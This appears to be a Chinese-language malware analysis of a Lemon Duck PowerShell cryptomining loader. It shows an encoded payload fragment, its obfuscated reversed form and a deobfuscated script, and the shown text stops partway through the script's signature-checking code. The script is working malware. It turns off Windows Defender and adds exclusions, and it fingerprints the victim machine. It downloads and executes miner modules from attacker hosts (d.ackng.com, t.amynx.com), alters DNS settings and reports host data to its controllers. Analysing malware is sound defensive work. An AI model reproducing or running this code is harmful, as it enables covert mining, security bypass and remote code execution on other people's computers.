b6adba817df3d42079f79ccee888d488205ba9f2c29790a988f3824e4e08fb3579ab7c2404dea8a1599e7a3cd78ce285d6504f73db256b21afe8b0506cd8c8288e773f61e7eba77fffe830c7a2fdfd9df3dbf7f60d2ca9f3e38df3dcf26e7e793bdfdbd83a96a385eb2a4c666c19154ecf8e2d305be350b9cf215cfd27d38ae0ff39dfbf98319fd369be6f73ecd77f34fa70ff287a69ffbb3fdfddd87b3e94c7bd08f1d24e9c4f661bfb0cb986a00e9fb7b3b93fde9f9fec1ecdefde9eeecc18199ce3d70f4bd838793ecc1943cbefd9d5c3b6343677ba1569371fd563bf2bf3bb8bfbb3b33e0ce0ff2ddf39ddde9cebd7b3bf901bdb433b93f3bbff760f26976ff4001b3ddf1d03f2f142abe5038c65532eede673a9e5f7ce740c2a41f14af69a6ebf62556f3f525513414307dbcf5517ae730fddeeb37afce969f7fffd1a3ef54c58bad8f3f4e47e9eff68bf62ef6bffdbd747b371d8fb7d32df97bfc3c5f7efee6db77d2efdf497fe6176ea5bfdbaa997fb9c8bfb7b7fbfd4f7eb797afe7d5e2f47bf776beffc9c7ef3ebef31b27ff0f'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
解密得到如下
sET-VarIaBlE ('Q2G'+'4h') ( ")''Nioj-'X'+]3,1[)ecNerEFerPESOBreV$]gNIRTS[( ( &| )63]rAHc[]gNiRTs[,)65]rAHc[+58]rAHc[+05]rAHc[((EcaLper.)93]rAHc[]gNiRTs[,)311]rAHc[+97]rAHc[+211]rAHc[((EcaLper.)'|',)021]rAHc[+121]rAHc[+311]rAHc[((EcaLper.)'
)qOpXqOp+]'+'31[DIlLEhs8U2+]1[dIlLEhS8'+'U2 ( .xy'+'q)69]rAHc[,qOpQUrqOp EcALP'+'e'+'rc-43]rAHc[,qOp7kMqOpEcALPerc-29]rAHc[,qOpd3yqOp EcALPerc- 63]rAHc[,)68]rAHc[+45]rAHc[+76]rAHc[( ECALPer- 93]rAHc[,)45'+']rAHc[+66]rAHc[+58]rAH'+'c[( ECALPer- 421]rAHc[,)18]rAHc[+501]rAHc[+001]'+'rAHc[( EcALPerc-)qOp}
7kMnib.edo/lru_nwodV6C7kM XEI'+'S
{))gol.kk4kkd3ypmt:qOp+qOpvneV6C htap-tset(!(fiqOp+qOp
}
}
}
7kMniqOp+qOpb.liamqOp+qOp_fi/lr'+'u_nwodV6C7kM XEIS
{))txt.4iq'+'Op+qOplamdogd3ypmt:vneV6C htap-tset(!(fi
{)liaMlacolV6C(fi
}{hctac})liaMlacolV6C]fer[,6BUqOp+qOpliaMlacoLd3ylqO'+'p+qOpabolG6BU,eurtV'+'6C(xetuM.gnidaerhT tcejbO-weN;esa'+'lfV6C=liaMlacolV6C{yrt
{)galfmV6qOp+qOpC(fi
}}}
yeksV6C htap-tset=qOp+qOpga'+'lfmV6C
drowqOp+qOpD epyt- 2 drauGledoMtcejbO yeksV6CqOp+qOp yqOp+qOptreporPm'+'etI-teS
}
yeksV6C metI-weNqOp+qOp
{))yeksV6C htaP-tseT(!(fi '+'
7kMytirqOp+qOpuceSd3yko'+'oltuOd3y_V6Cd3yhtapV6C::yrtsigeR7kM=yeksV6C
{hcaerofQid})kooltuOd3y_V6Cd3yhtapV6qOp+qOpC::yqOp+qOprtsigeR htaP-tseT( dnaqOp+qOp- 7kM+dd3y7kM hctam- _V6C{tcejbo-erehwQideman- htapV6C::yrtsigeR metidlihc-teg
{)htap'+'V6C::yrqOp+qOptsigqOp+qOpeR htap-tset(fi
{)shtapV6C ni htapV6C'+'(hcaerof
)7kMosmV6CdnwV6CmrcV6Cd3yosmVqOp+qOp6CskhV6C7kM,7kMosmV6CmrcV6Cd3yosmVqOp+qOp6CskhV6C7kM,7kMosmV6CdnwV6Csk'+'hV6C7kM,7kMosmV6CskhV6C7kM(@=shtapV6qOp+qOpC
7kqOp+qOpMd3yerawtfoSd3yENIHCAMd3'+'qOp+qOpy'+'YRTSIqOp+qOpGERd3ynuRoTkcilC7kM=mrcV6C
7kMd3y'+'edoN2346woW7kM=dnwV6C
7kMeciffOd3ytfosorciM7'+'kM=osmV6C
7kMd3yERAWTFOSd3yENIHCAM_LACOL_YEKH7kM=skhV6C'+'
q'+'Op+qOp
}{hctacqOp+qO'+'p}
}
} '+'
dnV6Cd3ypmt:vneV6C metI-evqOp+qOpomeR
)61,7kM*d3ydnV6Cd3ypmt:vneV6C7kM(er'+'eHypoC.)pmt:vneV6C(ecapSemaN.)nqOp+qOpoitacilppA.llehS tcejbOmoC- qOp'+'+qOptcejbO-weN(
)7kMdnV6Cd3ypmt:vqOp+qOpneV6C7kM,7kMdnV6C/7kM+lru_'+'nwodV6C(7kMeliqOp+qOpFdaolnwoD7kM.)tneilQUrCbeW.'+'tqOp+qOp'+'eN tceQUrjbo-wQUren(
{)86953022 en- htgnelq'+'Op+qOp.)gdnV6C metI-teG( ro- qOp+qOp)gdnV6C htap-tsetqOp+qOp(!(fi
'+'
7kMtad.gdvnd'+'3ypmt:vneV6C7kM=gdnV6C
7kMpiz.dvn7kM=dnV6C qOp+qOp
qOp+qOp{)46siV6C '+'dna- nsiV6C(fi
{yrt
7kMpsj.troper/lrqOp+qOpu_erocV6C7kM XEIS
}
}{hctac }
}
} '+'
qOp+qOp)setyb_warV6C]][rahc[nioj-qOp+qOp( XEI
{ ))yarrAety'+'bV6C,1ahsV6C,setyb_warV6C(ataDyfirev.asrV6C(fi
r'+'edivorPecivreSotpyrC1qOp+qOpAHS.yhpqOp+qOpargotpyrC.ytiruceS.metsyS'+' tcejbO-w'+'eN = 1ahsV6C
)46esabV6C(gnqOp+qOpirtS46esaBmorF::]trevnoc[ = yarrAety'+'bV6C
)setyb_ngisV6C]][rahc[(nioj- = 46esabqOp+qOpV6C
)smaraPasrV6C(sretemaraPtropmqOp+qOpI.asrVqOp+qOp6C
;redivorPecivreSotpyrCASR.yhpargotpyqOp+qOprC.ytiruceS.metsyS'+' em'+'aNqOp+qOpepyT- tcejbO-weN = asrV6C
10x0,00x0,10x0 q'+'Op+qOp= tnenopxE.smaraP'+'asrV6C qOp+qOp
d5x0,b6x0,qOp+qOp74xqOp+qOp0,7bx0,83x0,'+'aex0,79x0,eax0,b7x0,4ax0,36x0,88x0,7fx0,5dx0,36x0,dfx0,27x0,01x0,59x0,e2x0,6fx0,f3x'+'0,79'+'x0,bdx0qOp+qOp,89x0,a0x'+'0,bcx0,03x0,e6x0,93x0,fcx0,0dx'+'0,24x0'+',e8x0,59x0,eax0,a6x0,19qOp'+'+qOpx0,7ax'+'0'+',0qOp+qOp4x0,97x0,dcx0,21x0,2e'+'x0,fqOp+qOp9x0,7ax0,'+'a8x0,87x0,43x'+'0,'+'7cx0,7ex0,dcx0,10'+'x0,25x0,6cx0,37x0,03x0,91x0,1dx0,b2x0,d7x0,b9x0,e2x0,8bx0,c6x0,eex0,29x0,2fx0,53x0,fbx0,88x0,cdx0,06x0,1dx0,11x0,6fx0,fqOp+qOp4x0,'+'6ax0,dbx0,edx0,acx0,e6x0,69x0,70x0,68x0,0qOp+qOp7x0,26x0,b3x0,f'+'4x0,3fx0,b'+'6x0,7'+'3x0qOp+qOp,dcx0,dcx0,0cx0,d3x'+'0,25x0,c3x0,32x0,e4x0,eax0,6dx0,76x0,bex0,55x0,b7x0,c'+'6x0,e6x0,37x0,a9x0,35x0,37x0,ffx0,f2xqOp+qOp0'+',ffx0,28x0,d9x0,99x0,e5x0,14x'+'0,d6x0,cbx0,79x0,bbx0,7dx0qOp+qOp,8ax0,56x0,aqOp+qOpdx0 = suludoM.smara'+'PasrV6C
sretemaraPASR.yhpargotpyrC.ytiruceS.met'+'syS tcejbO-w'+'eN = smaraPasrV6C
;]tnuoc.setyb'+'_serV6C..371[setyb_serV6C = setyb_warVqOp+qOp6C
;]17'+'1..0[setyb_serV6C = s'+'etyb_ngisV6C
qOp+qOp{)371 tg- tnuoc.setyb_serV6C(fi
)'+'lrulanifV6C(ataDdaol'+'nwoD.tneilcbewV6C = setyb_serV6C
}{hctac }
))6BU-6BU,6BUd3qOp+qOpy6BU(ecalper.kcuD_nomeL'+'V6qOp+q'+'OpC+7kM-kcuDqOp+qOp-nomeL7kM,7kMtnegA-res'+'U7kM(dda.sredaqOp+qOpeH.tnei'+'lcbewV6C
{yrt
7kMsmarapV6C7kM+7kM?7kM+7kMlruV6C7kM = lrulanifV6C
tneilQUrCbeW.teN tceQUrjbO-wQUreN = tneilcbewV6C
{yrt
)
lruV6C]gnirts[
(maraP
{ XEIqOp+q'+'OpS noitcnuf
)7kM&7kMnioj-)7kM4.07kM,pmatsemitV6C,emitpuV6C,qOp+qOprhmV6C,pimV6C,vmV6C,)7kM7kMnioj-]5..0[5dmrklV6C(,)7kM7kMnioj-]5..0[5dmmlV6C(,)7kM7kMnioj-]5..0[5dmfilV6C(,'+'timrepV6C]tnI[,memV6C,dracV6C,evirdV6C,niamodV6C,resuV6C,46siV6C]tnI[,soV6qOp+qOpC(@(+7kM&7kM=+smarapV6C
}{hctac}))6BU9.9.9.96BU,6BU8.8.8.86BU(@(redrOhcraeSrevreqOp+qOpSSNDteS.)eurt='+'delbanepi retlif- noitarugifnoc'+'retpadakrowten_23niw'+' ssalc- tcejboimw-te'+'g({yrt
}
))emanerV6C bpg(+)nibrkV6C 5dmrkV6C 4edocV6C fcg(( pts
{)rKlacolV6C(fi
4edocV6C xEQUrI
7kMrK7kM edocg=4edocV6C
}
'+'}
))em'+'anerV6C nibgmV6qOp+qOpC apqOp+qOpg(+)nibgmV6C qOp+qOp5dmgmV6C 3edocV6C fcg(( pts
{qOp+qOp)gnMTlacolV6C(fi
3edocV6C xEQUrI
7kMqOp+qOpgnMT7kM'+' edocg=3edocV6C
{)46siV6C dna- )as'+'iV6C ro- nsiV6C((fi
}
}
))emanerV6C nibmV6C apg'+'(+)nibmV6C 5dmmV6C 2eqOp+qOpdocV6C fcg(( pts
{)nMTla'+'colV6C(fi
2edocV6C xEQUrI qOp+qOp
7kMnMT7kM edocg=2edocV6C
{)46s'+'iV6C(fi
}
))emaqOp+qOpnerV6C bpg(+'+')n'+'iqOp+qOpbfiV6C 5dqOp+qOpmfiV6C 1edocV6C fcg(( pts
{)fIlacolV6C(fi
1edocV6Cq'+'Op+qOp xEQUrI
7kMfI7kM edocg=1edocV6C
}
6qOp+qOpBU}{hctac})6BU+lfV6C+6BUlac'+'olV6C]fer[,6BU6BU6BU+lfV'+'6C+6BUlacoLed3ylabo'+'lG6BU6BU,eqOp+qOpurtV6C(xetuM.gnidaerhT tcejbO-weNqOp+qOp;esalfV6C=6BU+lfV6C+6BUlacolV6C{yrt6BU
qOp+qOp{ )'+'lfV6C(edocg noitcnuf
}
6BU- 6BU+emanV6C+6BUQid)nocV6C]][rahc[nioj-'+'('+'XEQ'+'U'+'rI6BU '+'
{)emanV6C(bpg noitcnuf
}
7kMexe'+'.manfV6Cd3y%pmt% & exe.manfV6Cd3y%pmtqOp+qOp% iro.manfV6Cd3yqOp+q'+'Op%pmt% y/'+' '+'ypoc c/ dmc& - '+'emanV6CQid7qOp+qOp'+'kM+)6BU&^^^6BU,'+'6BU&6BU(ecalper.)qOp+qOp6BUQiq'+'Op+qOpd^^^6BU,6BUQid6BU(ecalpeqOp+qO'+'pr.)6BUnibV6C setyBEP- 1tset;))001 tqOp+qOpnuoC- modnaR-teGQid)721..'+'1((+_'+'nibV6C,pemV6C(setyBllA'+'etirW::]eliF.OI.metqOp+qOpsySqOp+qOp[;6BU6BU6BU+7kMiro.manfV6Cd3y7kM+6BU6BU6BU+pmt:vneV6C=pemV6C;)(enolC.nibV6C=_nibVqOp+qOp6C;)0000'+'0001(setyBdaeRqOp+qOp.)))sseqOp+qOprpmoceD::]edoMnoisserpmoC.no'+'qOp+qOpisserpmoC.OI[( ,))])tnuoc.nocV6C(..)1+iV6C([nocV6CqOp+qOp,(maer'+'tSyrom'+'eM.OI.metsyS tcejbO-weN( maertSpi'+'zG.noisserpmoC.OI.me'+'tsyS tcejbqOp+qOpO-weN(redaeRyraqOp+qOpniB.OI tcejbO-weN(=nibV6C;)]iV6C..0qOp+qOp[nocV6C]qO'+'p+qOp][rahc[nioj-(xeQUri;}}kaerb{)a0x0 qe- ]iV6C[nocV6C(fi{)1=+iV6C;1-tnuoc.nocV6C tl- iV6C;0=iV6C(rofqOp+q'+'Op6BU(
{)emanV6C,manfV6C(apg '+'noitcnuf
}
)'+'6BU&^^^6BU,6BU&6BU(ecalper.)6BUQid^'+'^^6qOp+qOpBU,'+'6BUQid6B'+'qOp+qOpU(ecalper.)6BU}_5dm'+'V6C=5dmfiV6C;'+'_nocV6CqOp+qOp=nocV6C'+'{)puonV6C(fi}}1=puonV6C{esle})nocV6C,pfiV6C(setyBllAetirW::]eliF.OI.metsyS[{)5dmfiV6Cqe-tV6C(fi;no'+'cV6C 5dmg=tV6C;)6BU6BU6BU+'+'smarapV'+'6C+6BU?6BU+nfV6'+'C+6BU/6BU6BU+lru_nwodV6qOp+qOpC(aqOp+qOptaddaolnwod.)tneilQUrCbeW.teN'+' tceQUrjbO-wQUreN(=nocV6C'+'{)puonV6C!(fi}}1=puonV6C{)5dmfiV6Cqe-_5dmV6C(fi;_nocV6CqOp+qOp 5dmg=_5dmV6C;)pfiV6C('+'setyBllAdaeR::]eliF.OI.metsyqOp+qOpS[=_nocV6C{)pf'+'iV6C htap-tset(fi}sV6C nruter;})6BU6BU2x6BU6B'+'U(gnirtSoT._V6C=+sV6C{hcaerofQidqOp'+'+qOp)nocV6C(hsaHetupmoC.)(etaerC::]5DM.yhpargotpyrC.ytiruceS.metsyS[{)nocV6C(5dqOp+qOpmg noitcnuf;6BU6BU6BU+lru_nwodV6C+6BU6BU6BU=l'+'ru_nwodV6C;6BU6BU6BU+nfqOp+qOpV'+'6C+6BUd3y6BU6BU+pm'+'t:vneV'+'6C=pfiV6C;6BU6BU6BU'+'+dmV6C+6BU6BqOp+qOpU6BUqOp+qOp=5dmfiV6C;6BU+edocV6C+6BU ohce6BU(
{)nfV6C,dmV6C,edocV6C(fcg noitcnuf
}
7kMargV6C c/7kM tsiLtneqOp+qOpmugrA- exe.dmc htaPeliF- sseqOp+qOpcorP-'+'tqOp+qOpr'+'atS
argV6C tsoh-etirw
{)argV6C(pt'+'s noitcnuf
pmt:vneV'+'6C noitacol-tes
7kqOp+qOpM&7kMnioj-)camV6C,diqOp+qOpugV6C,e'+'man_pmocV6C,vV6C(@=sma'+'rapV6C
]1[)7kM?7kM(tilps.lruV6C=vV6C
}1=asiV6C{))7kMDMAQqOp+qOpidnoedaR7kM hctam- dracV6C((fi
}1=nsiV6C{))7kMECROFEGQidAIDIVNQidXTG7kM hctam- dracV6C((fi
}{hqOp+qOpctac}
emaneqOp+qOprV6Cd3y0.1vd3yqOp+qOpllehSrewoPswodniWd3y23met'+'sysd3yswodniwd3y:c ssecorPnoisu'+'lcxE- e'+'qOp+qOp'+'cnereferPpM-qOp+qOpddA
ex'+'e.llehsrewopd3y0.1'+'vd3yllehSrewoPqOp+qOpswodniWdqOp+qOp3y23metsysd3yqOp+qOpswodniwd3y:c ssecorPnoisulcxE- ecnereferPpM-ddA
d3y:c htaPnoisulcxE- ecnereferPpM-ddA
1 gnirotinoMemitlaeRel'+'basiD- ecnereferPpM-teS
{qOp+qOpyrt
}{hctac})6BU,6BU(nqOp+qOpioj-latot.etarhsah.jboV6C=rhmV6C
pi.noitcennoc.jboV6C=pimV6C
noisrev.jboV6C=vmV6C
qOp+qOp))6BUyrammus/qOp+qOp1/96634:1.0.'+'0.721//:ptth6BU(7kMgnirtsdaolnwqOp+qOpod7kM.'+')tneilQUrcbew.ten tceQUrjbo-wQUrenqOp+'+'qOp((tcejbOezilaireseD.)rezilaireStpircqOp+qOpSavaJ.noitaqOp+qOpzilaireS.tqOp+qOppircS.beW tcejbO-weN( = '+'jboV6C
)7kMsqOp+qOpnoisnetxE.beW.metsyS7kM(emaNlaitraPhtiqOp+qOpWdaoL::]ylbmessA.noitcelfeR[
{yrt
)9,0(gnirtsbuS.)7kMs%7kM tam'+'roFU- etaD-teG( = pmatsemitV6C
}{hctac}7kMQid7kMnioj-)}]0[))(gnqOp+qOpirtsot.epyTevirD._V6C(+7kM_7kM+]0[qOp+qOp)emaN._V6C({hca'+'erof Qid }))7kM23TAF7kM qe- tamroFevirD._V6C( ro- )7kMSFTN7kM qe'+'- tamroFevirD._V6C(( dna- ))7kMkrowteN7kM qe'+'- epyTevirD._V6C( ro- )7kMelbavom'+'eR7kM qe- epyTevirD._'+'V6C(( dna- )4201 tg- ecapSeerFelbaliavA._V6C( dqOp+qOpna- ydae'+'RsI._V6C{ erehw Qid )(sevirDteG::]ofnIevirD.OI.metsys[( = evirdV6C
{yrt
bG1/musmV6qOp+'+'qO'+'pC=memV6C;} yticapaC'+'._V6C =+ m'+'usmV6C { }0 = musmVqOp+qOp6C{% Qid yromeMlacisyhP_23niW imwg
eman'+'.)rellortnoCoediV_23'+'niW tcejbOimW-teG( = dracV6C
}sdnoceslaqO'+'p+qOptot._V6C{hcaerofQid)tnuoCkciT::]tnemnorivne[(sdnqOp+qOpocesilliMmorF::]napsemit['+' = emitpuV6C
niamoD.)metsysre'+'tupmoc_23niw tceqOp+qOpjbOimW-teG( = niamodV6qO'+'p+qOpC
EMANRESU:vneV6C = resuV6'+'qOp+qOpC
noisreV.bsoV6C+qOp+qOp7kM_7kM+)7kM7kM,7kM swodniW tfosorcqOp'+'+qOpiM7kM(ecalper.noitpaC.bsoV6C = soV'+'6C
)metsySgnitarepO_'+'23niW ssaqOp+qOplc- tcejbOimW-teG( = bsoV6C
'+'
1 tsrif'+'- tcejbo-tceles Qid sserddacaM.)}eurtV6C QE- delbanepi._V6C{ erehw QiqOp+qOpd noitarugifnoCretpadAkrowteN_23niW'+' tcejbOimW-teG( = camV6C
DIUU.)tcudorPmetsySretupmqOp+qOpoC_2qOp+qOp3niW tcejboimw-teg( =qOp+qOp diugV6C'+'
EMANRETUPMOC:vneV6C = eman_pmocV6C
)7kMrotartsinimdA7kM ]eloRnItliuBswodniW.lqOp+qOpapqOp'+'+qOpicnirP.yt'+'iruceS[(eloRnIsI.))(tnerruCteG:'+':]ytitnedIswodniW.lapicnirP.ytiruceS[]lapicnirPswo'+'dniW.lapicnirP.ytiruceS[( = timrepV6C
7kM/7kMnioj-]2..0[)7kM/7kM(tilps.lruV6C = lru_erocV6'+'C
}7kMmoc.xnyma.t//:ptth7kMq'+'Op+qOp=lrqOp+qOpuV6C{)lru'+'V6C!(fi
qOp+qOp7kMmoc.gnkca.d//:ptth7kM =qOp+qOp lru_nwodV6C
}{hctac}))7kMnibrkV6Cd3ypmt:vneV'+'6CqOp+qOp7kM(sqOp+qOpetyBllAdaeR::]eliF.OI[( 5dmg=5dmrklV6C{yrt
}{hctac}))7kMnibmV6Cd3ypmt:vne'+'V6C7qOp+qOpkM(setyBllAdaeR::]eliF.OI[( 5dmg=5dmmlV6C{yrt
}{hctacqOp+qOp}))7kMnibfiV6Cd3ypmt:vneV6C7kM(setyBllAdaeR::]eliF.OI[( 5'+'dmg=5dmfilVqOp+qOp6C{yrtqOp+qOp
7kM7kM,7kM7kM,7kM7kM=5dm'+'rklV6C,5dmmlV6C,5dmfilV6C
emanrteg=emanerV6C
}
emaqOp+qOpneV6C'+' nrqOp+qOputeqOp+qOpr
}7kMexe.llehsrewop7kM=emaneV6C{))7k'+'M'+'emanqOp+qOpeV6Cd3yhtaprV6C7k'+'qOp+qOpM htap-tset(!(fi
llun-tuoQid7kM'+'emaneV6Cd3yhtapr'+'V6C7kM 7kMexe.llehsrewopd3yhtaprV6C7kM meti-ypoc
7kMexe.7k'+'M + ))'+'6%)modnaR-teG(+6( tnuoC- modnaR-t'+'eGQid)221..79+09..56+75..84(]][rahc[(nioj-=emaneV6C
}
} qOp+qOp
emaneV6C nruter
{)_5dmV6C qe- 5dmtV6CqOp+qOp(fiqOp+qOp '+'
))7kMemaneV6Cd3yht'+'apqOp+q'+'OprV6C7kM(seqOp+qOptyBllAdaeR::]eliF'+'.OI[( qOp+qOp5dmg=_5dmV6'+'C
{)semaneV6C ni emaneV6C(hcaerof
))7kMexe.lleh'+'srewopd3yhtaprV'+'6C7kM(setyBllAqOp+qOpdaeR::]eliF.OI[( 5dmg = 5dmtVqOp+qOp6C
}eman._V6C{qOp+qOphqOp+qOpcaerofQidexe.llehsreqOp+qOpw'+'op edulcxE- exe.'+'* edulcnI- 7'+'kM*d3yhtaprV6C7kM icg = semaneV6C'+'
7kM0.1Vd3ylqOp+qOplehsrewopswodniWd3y23metsySqOp+qOpd3yswodniWd3y:C7kM=htapr'+'V6C
{)(emanrteg noitcnuf
}
lV6C nruter
})6BU2x6BU(gnirtS'+'oT._V6C=+lV6C{hcaerofQid)dV6C(hsaHqOp+qOpetupmoC.)(etaerC::]5DM.yhpargotpyrC.ytiruceS[
{)dV6C(5dmqOp+qOpg noitcnuf
}
7kM2962557a5'+'e041f580qOp+qOp67f1fabffb2428c7kM=5dmgmV6C'+'
7kMnib.g6m7kM=nibgmV6C
7'+'kM53'+'9e05e7d'+'dce36e1e6c7e90qOp+qOp5d4419dcd7kM=5dmqOp+qOpmV6C
7kMnib.6m7kM=nibmV6C
{)46siV6C(fi
7kM30b4cf48d35c1d78qOp+qOpd2'+'6389ba7ceca40e7kM=5dmrkV6C
7kMni'+'b.rk7kM=nibrkV6C
7kM8511d8qOp+qOpf8e1f01c0330e8'+'0b5df37b6a587kM=5dmfiV6C
7kMnib.fi7kM=nibfiV6qOp+qOpC'+'
}eurtV6C=46siV6C{)8 qe- eziS::]rtPtnI[qOp+qOp(fiqOp(( '(" ); [STRInG]::JoiN('' , $q2g4H[ -1 ..- ($q2g4H.LenGTH) ]) |&( $pshOme[21]+$PShomE[30]+'x')
翻转+去混淆如下
if([IntPtr]::Size -eq 8){$is64=$true}
$ifbin="if.bin"
$ifmd5="85a6b73fd5b08e0330c10f1e8f8d1158"
$krbin="kr.bin"
$krmd5="e04acec7ab98362d87d1c53d84fc4b03"
if($is64){
$mbin="m6.bin"
$mmd5="dcd9144d509e7c6e1e63ecdd7e50e935"
$mgbin="m6g.bin"
$mgmd5="c8242bffbaf1f76085f140e5a7552692"
}
function gmd5($d){
[Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')}
return $l
}
function getrname(){
$rpath="C:\Windows\System32\Windowspowershell\V1.0"
$enames = gci "$rpath\*" -Include *.exe -Exclude powershell.exe|foreach{$_.name}
$tmd5 = gmd5 ([IO.File]::ReadAllBytes("$rpath\powershell.exe"))
foreach($ename in $enames){
$md5_=gmd5 ([IO.File]::ReadAllBytes("$rpath\$ename"))
if($tmd5 -eq $md5_){
return $ename
}
}
$ename=-join([char[]](48..57+65..90+97..122)|Get-Random -Count (6+(Get-Random)%6)) + ".exe"
copy-item "$rpath\powershell.exe" "$rpath\$ename"|out-null
if(!(test-path "$rpath\$ename")){$ename="powershell.exe"}
return $ename
}
$rename=getrname
$lifmd5,$lmmd5,$lkrmd5="","",""
try{$lifmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$ifbin"))}catch{}
try{$lmmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$mbin"))}catch{}
try{$lkrmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$krbin"))}catch{}
$down_url = "http://d.ackng.com"
if(!$url){$url="http://t.amynx.com"}
$core_url = $url.split("/")[0..2]-join"/"
$permit = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
$comp_name = $env:COMPUTERNAME
$guid = (get-wmiobject Win32_ComputerSystemProduct).UUID
$mac = (Get-WmiObject Win32_NetworkAdapterConfiguration diQ where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1
$osb = (Get-WmiObject -class Win32_OperatingSystem)
$os = $osb.Caption.replace("Microsoft Windows ","")+"_"+$osb.Version
$user = $env:USERNAME
$domain = (Get-WmiObject win32_computersystem).Domain
$uptime = [timespan]::FromMilliseconds([environment]::TickCount)|foreach{$_.totalseconds}
$card = (Get-WmiObject Win32_VideoController).name
gwmi Win32_PhysicalMemory | %{$msum = 0} { $msum += $_.Capacity };
$mem=$msum/1Gb
try{
$drive = ([system.IO.DriveInfo]::GetDrives() | where {$_.IsReady -and ($_.AvailableFreeSpace -gt 1024) -and (($_.DriveType -eq "Removable") -or ($_.DriveType -eq "Network")) -and (($_.DriveFormat -eq "NTFS") -or ($_.DriveFormat -eq "FAT32"))} | foreach{($_.Name)[0]+"_"+($_.DriveType.tostring())[0]})-join"|"}catch{}
$timestamp = (Get-Date -UFormat "%s").Substring(0,9)
try{
[Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions")
$obj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((new-object net.webclient)."downloadstring"('http://127.0.0.1:43669/1/summary'))
$mv=$obj.version
$mip=$obj.connection.ip
$mhr=$obj.hashrate.total-join(',')}catch{}
try{
Set-MpPreference -DisableRealtimeMonitoring 1
Add-MpPreference -ExclusionPath c:\
Add-MpPreference -ExclusionProcess c:\windows\system32y3dWindowsPowerShell\v1.0\powershell.exe
Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\$rename
}catch{}
if(($card -match "GTX|NVIDIA|GEFORCE")){$isn=1}
if(($card -match "RadeondiQAMD")){$isa=1}
$v=$url.split("?")[1]
$params=@($v,$comp_name,$guid,$mac)-join"&"
set-location $env:tmp
function stp($gra){
write-host $gra
Start-Process -FilePath cmd.exe -ArgumentList "/c $gra"
}
function gcf($code,$md,$fn){
('echo '+$code+';
$ifmd5='UB6'+$md+''';
$ifp=$env:tmp+''\'+$fn+''';
$down_url='''+$down_url+''';
function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$_.ToString(''x2'')};
return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);
$md5_=gmd5 $con_;
if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient).downloaddata($down_url+''/'+$fn+'?'+$params+''');
$t=gmd5 $con;
if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;
$ifmd5=$md5_}').replace(UB6|',UB6^^^|').replace('&','^^^&')
}
function gpa($fnam,$name){
('for($i=0;
$i -lt $con.count-1;
$i+=1){if($con[$i] -eq 0x0a){break}};
iex(-join[char[]]$con[0..$i]);
$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);
$bin_=$bin.Clone();
$mep=$env:tmp+'''+"\$fnam.ori"+''';
[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)|Get-Random -Count 100));
test1 -PEBytes $bin').replace('|','^^^diQ').replace('&','^^^&')+"|$name - &cmd /c copy /y %tmp%\$fnam.ori %tmp%\$fnam.exe & %tmp%\$fnam.exe"
}
function gpb($name){
IEX(-join[char[]]$con)|'+$name+' -'
}
function gcode($fl) {
try{$local+$fl+=$flase;
New-Object Threading.Mutex($true,''Global\eLocal'+$fl+''',[ref]$local'+$fl+')}catch{}UB6
}
$code1=gcode "If"
IEx $code1
if($localIf){
stp ((gcf $code1 $ifmd5 $ifbin)+(gpb $rename))
}
if($is64){
$code2=gcode "TMn"
IEx $code2
if($localTMn){
stp ((gcf $code2 $mmd5 $mbin)+(gpa $mbin $rename))
}
}
if(($isn -or $isa) -and $is64){
$code3=gcode "TMng"
IEx $code3
if($localTMng){
stp ((gcf $code3 $mgmd5 $mgbin)+(gpa $mgbin $rename))
}
}
$code4=gcode "Kr"
IEx $code4
if($localKr){
stp ((gcf $code4 $krmd5 $krbin)+(gpb $rename))
}
try{(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder(@('8.8.8.8','9.9.9.9'))}catch{}
$params+="&"+(@($os,[Int]$is64,$user,$domain,$drive,$card,$mem,[Int]$permit,($lifmd5[0..5]-join""),($lmmd5[0..5]-join""),($lkrmd5[0..5]-join""),$mv,$mip,$mhr,$uptime,$timestamp,"0.4")-join"&")
function SIEX {
Param(
[string]$url
)
try{
$webclient = New-Object Net.WebClient
$finalurl = "$url"+"?"+"$params"
try{
$webclient.Headers.add("User-Agent","Lemon-Duck-"+$Lemon_Duck.replace('y3d','-'))
} catch{}
$res_bytes = $webclient.DownloadData($finalurl)
if($res_bytes.count -gt 173){
$sign_bytes = $res_bytes[0..171];
$raw_bytes = $res_bytes[173..$res_bytes.count];
$rsaParams = New-Object System.Security.Cryptography.RSAParameters
